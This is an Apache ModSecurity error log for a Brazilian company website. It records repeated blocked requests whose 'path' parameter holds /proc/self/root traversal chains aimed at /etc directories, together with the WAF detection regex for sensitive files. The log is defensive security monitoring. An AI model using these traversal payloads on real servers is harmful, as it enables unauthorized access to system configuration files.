[Wed Mar 18 13:20:42.552014 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:41364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQ2uw_le52K8_3pV34_wAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:20:51.571205 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:43842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrQ4wbLMZ6AikZjR9XahAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:21:24.272582 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:46648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRBMdf6f5d65gmYZTvTwAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:22:01.430808 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:50470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRKOyqAr6etmhZHNrhKQAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:22:23.862718 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.241.31:54956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRPwbLMZ6AikZjR9Xa2gAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:22:40.924199 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:45960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRUNa6ubjKNq_cu4a5XAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:23:30.809394 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.241.31:57196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRgsdf6f5d65gmYZTvugAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:23:46.979641 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:53252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRkuoXxyEfFpUF8f-JEAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:24:11.154510 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.228.61:54480] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrRqeoXxyEfFpUF8f-JIgAAAUc"]
[Wed Mar 18 13:24:11.155495 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.244.43:35512] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrRquoXxyEfFpUF8f-JIwAAAUQ"]
[Wed Mar 18 13:24:34.755227 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:46182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrRwuyqAr6etmhZHNrhxgAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:24:51.950090 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:35618] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrR0-yqAr6etmhZHNrh1QAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:24:54.351013 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:47068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrR1uoXxyEfFpUF8f-JUgAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:25:41.063159 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:44726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSBeoXxyEfFpUF8f-JkQAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:25:57.591414 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.241.31:47078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSFSmAPhZkrhU8w4mI4QAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:26:15.216746 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.241.31:57168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSJ-w_le52K8_3pV35jwAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:26:32.511340 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:49512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSOOoXxyEfFpUF8f-J0QAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:26:43.048141 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:50340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSQymAPhZkrhU8w4mJAwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:27:06.419257 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.241.31:41714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSWuyqAr6etmhZHNriOAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:27:17.570672 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:59804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSZew_le52K8_3pV35tQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:27:23.948939 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:54932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSa0zinOy1jxa1j4cyVwAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:27:38.776918 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:46754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSesdf6f5d65gmYZTwQgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:27:41.155833 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.241.31:42204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSfSmAPhZkrhU8w4mJPwAAAIE"], referer: 